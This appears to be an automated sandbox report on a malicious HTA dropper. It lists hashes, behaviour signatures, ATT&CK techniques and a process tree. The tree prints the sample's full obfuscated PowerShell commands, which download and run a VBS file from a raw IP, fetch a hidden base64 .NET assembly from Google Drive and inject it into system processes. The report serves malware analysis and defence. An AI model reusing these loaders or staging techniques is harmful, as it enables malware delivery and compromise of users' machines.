9ca5ac2764a3fdcfa154438072ee6439679dc6e920ecc4a753c34eab3b80deff

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
07/11/2024, 02:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9ca5ac2764a3fdcfa154438072ee6439679dc6e920ecc4a753c34eab3b80deff.hta
Size

207KB
MD5

a834a210eda3bb2a9c5a69e046043cf5
SHA1

d3f7e634a214c3edda1a69b496cae5e8f4c58492
SHA256

9ca5ac2764a3fdcfa154438072ee6439679dc6e920ecc4a753c34eab3b80deff
SHA512

6019b4c7788df78c3ea2752fe9085e66b333e7f52a31ce9b4632e1d59b8ab3b44c9a96e6e585a33749840e4af422dcaf14ff0d53a4823d65e96ae70aeea98298
SSDEEP

96:43F97ZLDySraaVxDyIraaVn6cKt1zRoy3yyhDywMDyPDraaVSDyCQ:43F1ZLdr3Dpr3AcKvay3ySGsDr3wTQ

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

exe.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

Signatures

Blocklisted process makes network request 30 IoCs

flow	pid	Process
14	3048	POWErsHell.eXE
17	3132	powershell.exe
21	3132	powershell.exe
26	3132	powershell.exe
40	2364	mshta.exe
46	2364	mshta.exe
48	2364	mshta.exe
49	2364	mshta.exe
50	2364	mshta.exe
51	2364	mshta.exe
53	2364	mshta.exe
55	2364	mshta.exe
58	2364	mshta.exe
63	2364	mshta.exe
64	2364	mshta.exe
66	2364	mshta.exe
68	2364	mshta.exe
69	2364	mshta.exe
70	2364	mshta.exe
71	2364	mshta.exe
73	2364	mshta.exe
75	2364	mshta.exe
76	2364	mshta.exe
77	2364	mshta.exe
78	2364	mshta.exe
80	2364	mshta.exe
81	2364	mshta.exe
82	2364	mshta.exe
83	2364	mshta.exe
84	2364	mshta.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4288	powershell.exe
3132	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
2292	powershell.exe
3048	POWErsHell.eXE

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
16	drive.google.com
17	drive.google.com

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 3132 set thread context of 2148	3132	powershell.exe	106
PID 2148 set thread context of 2364	2148	aspnet_compiler.exe	82
PID 2148 set thread context of 2356	2148	aspnet_compiler.exe	110
PID 2356 set thread context of 2364	2356	setupugc.exe	82
PID 2356 set thread context of 5088	2356	setupugc.exe	112

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setupugc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	POWErsHell.eXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\Registry\User\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2	setupugc.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings	POWErsHell.eXE

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
3048	POWErsHell.eXE
3048	POWErsHell.eXE
2292	powershell.exe
2292	powershell.exe
4288	powershell.exe
4288	powershell.exe
3132	powershell.exe
3132	powershell.exe
3132	powershell.exe
3132	powershell.exe
2148	aspnet_compiler.exe
2148	aspnet_compiler.exe
2148	aspnet_compiler.exe
2148	aspnet_compiler.exe
2148	aspnet_compiler.exe
2148	aspnet_compiler.exe
2148	aspnet_compiler.exe
2148	aspnet_compiler.exe
2356	setupugc.exe
2356	setupugc.exe
2356	setupugc.exe
2356	setupugc.exe
2356	setupugc.exe
2356	setupugc.exe
2356	setupugc.exe
2356	setupugc.exe

Suspicious behavior: MapViewOfSection 7 IoCs

pid	Process
2148	aspnet_compiler.exe
2364	mshta.exe
2364	mshta.exe
2356	setupugc.exe
2356	setupugc.exe
2356	setupugc.exe
2356	setupugc.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	3048	POWErsHell.eXE
Token: SeDebugPrivilege	2292	powershell.exe
Token: SeDebugPrivilege	4288	powershell.exe
Token: SeDebugPrivilege	3132	powershell.exe

Suspicious use of WriteProcessMemory 35 IoCs

description	pid	Process	procid_target
PID 2364 wrote to memory of 3048	2364	mshta.exe	85
PID 2364 wrote to memory of 3048	2364	mshta.exe	85
PID 2364 wrote to memory of 3048	2364	mshta.exe	85
PID 3048 wrote to memory of 2292	3048	POWErsHell.eXE	89
PID 3048 wrote to memory of 2292	3048	POWErsHell.eXE	89
PID 3048 wrote to memory of 2292	3048	POWErsHell.eXE	89
PID 3048 wrote to memory of 1040	3048	POWErsHell.eXE	92
PID 3048 wrote to memory of 1040	3048	POWErsHell.eXE	92
PID 3048 wrote to memory of 1040	3048	POWErsHell.eXE	92
PID 1040 wrote to memory of 1408	1040	csc.exe	93
PID 1040 wrote to memory of 1408	1040	csc.exe	93
PID 1040 wrote to memory of 1408	1040	csc.exe	93
PID 3048 wrote to memory of 3612	3048	POWErsHell.eXE	98
PID 3048 wrote to memory of 3612	3048	POWErsHell.eXE	98
PID 3048 wrote to memory of 3612	3048	POWErsHell.eXE	98
PID 3612 wrote to memory of 4288	3612	WScript.exe	99
PID 3612 wrote to memory of 4288	3612	WScript.exe	99
PID 3612 wrote to memory of 4288	3612	WScript.exe	99
PID 4288 wrote to memory of 3132	4288	powershell.exe	101
PID 4288 wrote to memory of 3132	4288	powershell.exe	101
PID 4288 wrote to memory of 3132	4288	powershell.exe	101
PID 3132 wrote to memory of 2192	3132	powershell.exe	105
PID 3132 wrote to memory of 2192	3132	powershell.exe	105
PID 3132 wrote to memory of 2192	3132	powershell.exe	105
PID 3132 wrote to memory of 2148	3132	powershell.exe	106
PID 3132 wrote to memory of 2148	3132	powershell.exe	106
PID 3132 wrote to memory of 2148	3132	powershell.exe	106
PID 3132 wrote to memory of 2148	3132	powershell.exe	106
PID 3132 wrote to memory of 2148	3132	powershell.exe	106
PID 3132 wrote to memory of 2148	3132	powershell.exe	106
PID 2364 wrote to memory of 2356	2364	mshta.exe	110
PID 2364 wrote to memory of 2356	2364	mshta.exe	110
PID 2364 wrote to memory of 2356	2364	mshta.exe	110
PID 2356 wrote to memory of 5088	2356	setupugc.exe	112
PID 2356 wrote to memory of 5088	2356	setupugc.exe	112

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\9ca5ac2764a3fdcfa154438072ee6439679dc6e920ecc4a753c34eab3b80deff.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2364
- C:\Windows\SysWOW64\WiNdowSpOWerShelL\v1.0\POWErsHell.eXE
  "C:\Windows\SYsTEM32\WiNdowSpOWerShelL\v1.0\POWErsHell.eXE" "pOWErsheLl.exE -EX BypaSS -NOp -w 1 -C DeVIcecRedentiaLDepLoYmENT.eXE ; IeX($(IEx('[syStEm.tEXt.ENcoDing]'+[ChaR]58+[char]58+'Utf8.getStRInG([SYStEm.CONVERT]'+[CHaR]0x3a+[cHaR]0x3A+'fROmbASe64stRinG('+[cHar]0x22+'JEE5QjJqICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9OLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRwY1VPTmRSLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdjWFpDLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRNVXVCLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNdGZMc256LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEliQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImRkUGJnTElwWEIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVTUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEthSXZOWFFvICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBOUIyajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNDYvMjE3L3NlZXRoZWJlc3R0aGluZ3N3aXRoZ29vZG5ld3NnaXZlbm1lZ3JlYXR3YXlzLnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0dGhpbmdzd2l0aGdvb2RuZXdzZ2l2ZW5tZWdyZWF0dy52YnMiLDAsMCk7U1RBcnQtU2xFZXAoMyk7c1RhUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3N3aXRoZ29vZG5ld3NnaXZlbm1lZ3JlYXR3LnZicyI='+[ChAr]34+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3048
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BypaSS -NOp -w 1 -C DeVIcecRedentiaLDepLoYmENT.eXE
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2292
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2y2etigm\2y2etigm.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1040
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA345.tmp" "c:\Users\Admin\AppData\Local\Temp\2y2etigm\CSC46AA2912C3EE4C348AE84B86A9AD7CE.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1408
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingswithgoodnewsgivenmegreatw.vbs"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3612
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzaG9NRVsyMV0rJFBzaG9NZVszNF0rJ3gnKSggKCc3eicrJ3hpbWFnZVVybCA9IEs5a2h0dHBzOi8vZHJpdicrJ2UuZ29vZ2xlLmNvbS91Yz9leHBvcnQnKyc9ZG93bmxvYWQmaWQ9MVV5SHF3cm5YQ2xLQkozajYzTGwxdDJTdFZnR3hiU3QwIEs5azs3eicrJ3h3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OZXQuJysnV2ViQ2xpZW50Ozd6eGknKydtYWdlQnl0JysnZXMgPSA3eicrJ3h3ZWJDbGllbnQuRG93bmxvYWREYXRhKDd6eGltYWdlVXJsKTs3enhpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg3enhpbWFnZUJ5dGVzKTs3enhzdGFydEZsYWcgPSBLOWs8PEJBU0U2NF9TVEFSVD4+SzlrOzd6eGUnKyduZEZsYWcgPSBLOWs8PEJBU0U2NF9FTkQ+Pks5azs3enhzdGFydEluZGV4ID0gN3p4aW1hZ2VUZXh0LkluZGV4T2YoN3p4c3RhcnRGbGFnKTsnKyc3enhlbmRJbmRleCA9IDd6eGltYWdlVGV4dC5JbmRleE9mKDd6JysneGVuZEZsYWcpOzd6eHN0YXJ0SW5kZXggLWcnKydlIDAgLWFuZCA3JysnenhlbmRJbicrJ2RleCAtZ3QgN3onKyd4c3RhcnRJbmQnKydleDs3enhzdGFydEluZGV4ICs9IDd6eHN0YXJ0RmxhZy5MZW5ndGg7N3p4YmFzZTYnKyc0TGVuZ3RoID0gN3p4ZW5kJysnSW5kZXggLSA3enhzdGFydEluZCcrJ2UnKyd4Ozd6eGJhc2U2NENvbW1hbmQnKycgPSA3enhpbWFnZVQnKydleHQuU3Vic3RyaW5nKDd6eHN0YXJ0SW5kZXgsJysnIDd6eGJhc2U2NExlbmd0aCk7N3p4YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoN3p4YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIGFDeCBGb3JFYWNoLU9iamVjdCB7IDd6eF8gfSknKydbLTEuLi0oN3p4YmFzZTY0Q29tbWFuZC5MZScrJ25ndGgpXTs3enhjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDd6JysneGJhc2U2NFJldmVyc2VkKTs3enhsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdCcrJ2lvbi5Bc3NlbWJseV06OicrJ0xvYWQoN3p4Y29tbWFuZEJ5dGVzKTs3enh2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKEs5a1ZBSUs5ayk7N3p4dmFpTWV0aG9kLkludm9rZSg3enhudWxsLCBAKEs5a3R4dC5SUklNTUEnKydDLzcxMi82NDEuMzkxLjMuMjkxLy86cCcrJ3R0aEs5aywgSzlrZGVzYXRpdmFkb0s5aywgSzlrZGVzYXRpdmFkJysnb0s5aywgSzlrZGVzYXRpdmFkb0s5aywgSzlrYXNwbmV0X2NvbXBpbGVySzlrLCBLOWtkZXNhdGl2YWRvSzlrLCAnKydLOWtkJysnZXNhdGl2YWRvSzlrLEs5a2Rlc2F0aXZhZG9LOWssSzknKydrZGVzYScrJ3RpdmFkb0s5ayxLOWtkZXNhdGl2YWQnKydvSzlrLEs5a2Rlc2F0aXZhZG9LOWssSzlrZGUnKydzYXRpdmFkb0s5ayxLOWsxSzlrLEs5a2Rlc2F0aXZhZG9LOWspKTsnKS5SRXBsYUNFKCdhQ3gnLFtTVFJJbmddW0NIQVJdMTI0KS5SRXBsYUNFKChbQ0hBUl03NStbQ0hBUl01NytbQ0hBUl0xMDcpLFtTVFJJbmddW0NIQVJdMzkpLlJFcGxhQ0UoJzd6eCcsJyQnKSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4288
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $pshoME[21]+$PshoMe[34]+'x')( ('7z'+'ximageUrl = K9khttps://driv'+'e.google.com/uc?export'+'=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0 K9k;7z'+'xwebClient = New-Object Sys'+'tem.Net.'+'WebClient;7zxi'+'mageByt'+'es = 7z'+'xwebClient.DownloadData(7zximageUrl);7zximageText = [System.Text.Encoding]::UTF8.GetString(7zximageBytes);7zxstartFlag = K9k<<BASE64_START>>K9k;7zxe'+'ndFlag = K9k<<BASE64_END>>K9k;7zxstartIndex = 7zximageText.IndexOf(7zxstartFlag);'+'7zxendIndex = 7zximageText.IndexOf(7z'+'xendFlag);7zxstartIndex -g'+'e 0 -and 7'+'zxendIn'+'dex -gt 7z'+'xstartInd'+'ex;7zxstartIndex += 7zxstartFlag.Length;7zxbase6'+'4Length = 7zxend'+'Index - 7zxstartInd'+'e'+'x;7zxbase64Command'+' = 7zximageT'+'ext.Substring(7zxstartIndex,'+' 7zxbase64Length);7zxbase64Reversed = -join (7zxbase64Command.ToCharArray() aCx ForEach-Object { 7zx_ })'+'[-1..-(7zxbase64Command.Le'+'ngth)];7zxcommandBytes = [System.Convert]::FromBase64String(7z'+'xbase64Reversed);7zxloadedAssembly = [System.Reflect'+'ion.Assembly]::'+'Load(7zxcommandBytes);7zxvaiMethod = [dnlib.IO.Home].GetMethod(K9kVAIK9k);7zxvaiMethod.Invoke(7zxnull, @(K9ktxt.RRIMMA'+'C/712/641.391.3.291//:p'+'tthK9k, K9kdesativadoK9k, K9kdesativad'+'oK9k, K9kdesativadoK9k, K9kaspnet_compilerK9k, K9kdesativadoK9k, '+'K9kd'+'esativadoK9k,K9kdesativadoK9k,K9'+'kdesa'+'tivadoK9k,K9kdesativad'+'oK9k,K9kdesativadoK9k,K9kde'+'sativadoK9k,K9k1K9k,K9kdesativadoK9k));').REplaCE('aCx',[STRIng][CHAR]124).REplaCE(([CHAR]75+[CHAR]57+[CHAR]107),[STRIng][CHAR]39).REplaCE('7zx','$') )"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3132
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        6⤵
        
        PID:2192
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        6⤵
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:2148
- C:\Windows\SysWOW64\setupugc.exe
  "C:\Windows\SysWOW64\setupugc.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:2356
- - C:\Program Files\Mozilla Firefox\Firefox.exe
    "C:\Program Files\Mozilla Firefox\Firefox.exe"
    3⤵
    PID:5088

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\POWErsHell.eXE.log

Filesize
2KB

MD5
3d086a433708053f9bf9523e1d87a4e8

SHA1
b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

SHA256
6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

SHA512
931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
ba534ea8e88d9edf61d5f9589b68b0fd

SHA1
af66d85643a625b374ba49b805542b376a222b3b

SHA256
69e91058bbe1ebd3e09f364218b0f5553ba2e71536c98f143c2099d6af68fe1a

SHA512
b9cf4524f4951b22b2205c412122361836c16dfb4e21608c6c5ef4cb65f42e3fb10ca59309d79cd33f06468ab5058bc237c270be7ebfe33a8d50d169905017ae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
6950ff7e0c0f0a53efc7363d656148fd

SHA1
57b72cbb802fb7c0b5433d40268e61adc789ab45

SHA256
35a30883527aa900ec2c1cd8be9a041732a6ed86e27407b7b2b1f02d2c25799f

SHA512
9c1c686f63ed5b797ea940a40cba122f71f97993b8ccff987ac76b278b1bfd459e69341671f3b57d18cb27d6c72f6364262bb2181428847694c8c042903b9949

Download Submit
C:\Users\Admin\AppData\Local\Temp\2y2etigm\2y2etigm.dll

Filesize
3KB

MD5
045b3b2bbb01d0a614f6083796eef4e0

SHA1
1e8f54adcb89b76a87b6929a6c1e09ff76faa09e

SHA256
70cf93a8016abe48ec7dbddb5a72af8d189d9180d030d928530b463241c078f2

SHA512
8508b012729f92d341c94957d749099b0791528a2c6c826559599679c2cd3098ec9025ec38055a4d16450b291887ea76fd4b45b54f00b9af8b4ce148ef1469f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA345.tmp

Filesize
1KB

MD5
0247c31b512e1f7719732a60829cbee3

SHA1
16949587db9f0264be925943b7af3fc7f69a54e6

SHA256
ca9ada3c73f47ab487de026bfd73c000a0e37482c032e018a43ae05627cea247

SHA512
ec2cc350e90684c14b33e043a2035afc20ac476e91b67c2ff42258f699b23341365f01f5350c84674b0c53b77281d123714230ad259c0617044dce91f4960b24

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_avjvu5qo.dmn.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\seethebestthingswithgoodnewsgivenmegreatw.vbs

Filesize
138KB

MD5
6d668e698465e2b247c18af64cd92768

SHA1
9f0d8dc1bf9863ce10df0779404b46f11e05878e

SHA256
ebe21b018238666a7386c805e391635b4a6a1397be0cebcc1cd1a0b4c2a9ac03

SHA512
53d6e582ad8ab0a373183e4825a829ab9788dcd965b76912b2666a0ad6e17233f100a2c9916fc9bb36c6034a4b21588ac26793f87f7f66b2f5037652ea989d8e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2y2etigm\2y2etigm.0.cs

Filesize
483B

MD5
0d07f4ab30ba01353f767eca7b280b1a

SHA1
b5b6d65652a490f5eeeaf899884cec55cc09d455

SHA256
f7082f6db40c262a4b1f34cbf2e9a8ed8a97090e49968d630cb087d1a62ef31e

SHA512
001b1bd234cf1f9dacf6fa54fad0857277c4c349c2f615fb4f6d2c1dc064a249594aedb1c9587a7f1eba1de1a9aa825e5f415248ddc9379475723105524165a3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2y2etigm\2y2etigm.cmdline

Filesize
369B

MD5
faaa2420f277dcab393401fc70522d64

SHA1
abbc1a2d17011b9b38cb3e75f2cb7f511b64e63b

SHA256
0476b05c93092b0c9b0ef5392bf65359f54d26a035db5d3014ec9d58982e4153

SHA512
ddb1aaee508aef029024cdf3e96dd0dd6b7f00a8e5207688a1af2cf43a110eb395e7e65f18ab6e0513b6a822e1342352631090abe7b367a55419a3b51d11ee30

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2y2etigm\CSC46AA2912C3EE4C348AE84B86A9AD7CE.TMP

Filesize
652B

MD5
ec4a9b1e96e66cfb9fcf41180779f432

SHA1
65c8b96275a380f90e1369b06c70261126bdb0d5

SHA256
b9b61800810c0619996f3549afc257c34b1af6ce46691a324bc4590223829d7a

SHA512
0007fd7ab0ea98e2b00ede381b6697f743bca4b5e42b401cbb489e8bb5927f5899e854898a96a363782a6c98d347db1ed93340cdf65bef17053a5366cb7e7379

Download Submit
memory/2148-103-0x0000000000400000-0x0000000000447000-memory.dmp

Filesize
284KB

Download
memory/2292-48-0x0000000007400000-0x000000000741A000-memory.dmp

Filesize
104KB

Download
memory/2292-44-0x0000000007340000-0x00000000073D6000-memory.dmp

Filesize
600KB

Download
memory/2292-39-0x0000000006F00000-0x0000000006F1E000-memory.dmp

Filesize
120KB

Download
memory/2292-40-0x0000000006F80000-0x0000000007023000-memory.dmp

Filesize
652KB

Download
memory/2292-41-0x00000000076F0000-0x0000000007D6A000-memory.dmp

Filesize
6.5MB

Download
memory/2292-42-0x00000000070B0000-0x00000000070CA000-memory.dmp

Filesize
104KB

Download
memory/2292-43-0x0000000007110000-0x000000000711A000-memory.dmp

Filesize
40KB

Download
memory/2292-29-0x000000006DD00000-0x000000006DD4C000-memory.dmp

Filesize
304KB

Download
memory/2292-45-0x00000000072B0000-0x00000000072C1000-memory.dmp

Filesize
68KB

Download
memory/2292-46-0x00000000072E0000-0x00000000072EE000-memory.dmp

Filesize
56KB

Download
memory/2292-47-0x00000000072F0000-0x0000000007304000-memory.dmp

Filesize
80KB

Download
memory/2292-28-0x0000000006F40000-0x0000000006F72000-memory.dmp

Filesize
200KB

Download
memory/2292-49-0x0000000007330000-0x0000000007338000-memory.dmp

Filesize
32KB

Download
memory/2356-108-0x0000000000170000-0x00000000001B3000-memory.dmp

Filesize
268KB

Download
memory/2356-107-0x0000000000170000-0x00000000001B3000-memory.dmp

Filesize
268KB

Download
memory/2364-109-0x0000000005200000-0x00000000052F3000-memory.dmp

Filesize
972KB

Download
memory/3048-6-0x0000000005CB0000-0x0000000005D16000-memory.dmp

Filesize
408KB

Download
memory/3048-3-0x0000000005520000-0x0000000005B48000-memory.dmp

Filesize
6.2MB

Download
memory/3048-64-0x00000000068C0000-0x00000000068C8000-memory.dmp

Filesize
32KB

Download
memory/3048-70-0x000000007144E000-0x000000007144F000-memory.dmp

Filesize
4KB

Download
memory/3048-71-0x0000000071440000-0x0000000071BF0000-memory.dmp

Filesize
7.7MB

Download
memory/3048-72-0x00000000076C0000-0x00000000076E2000-memory.dmp

Filesize
136KB

Download
memory/3048-73-0x0000000008570000-0x0000000008B14000-memory.dmp

Filesize
5.6MB

Download
memory/3048-5-0x0000000005B50000-0x0000000005BB6000-memory.dmp

Filesize
408KB

Download
memory/3048-4-0x0000000005440000-0x0000000005462000-memory.dmp

Filesize
136KB

Download
memory/3048-16-0x0000000005D20000-0x0000000006074000-memory.dmp

Filesize
3.3MB

Download
memory/3048-80-0x0000000071440000-0x0000000071BF0000-memory.dmp

Filesize
7.7MB

Download
memory/3048-0-0x000000007144E000-0x000000007144F000-memory.dmp

Filesize
4KB

Download
memory/3048-18-0x00000000063A0000-0x00000000063EC000-memory.dmp

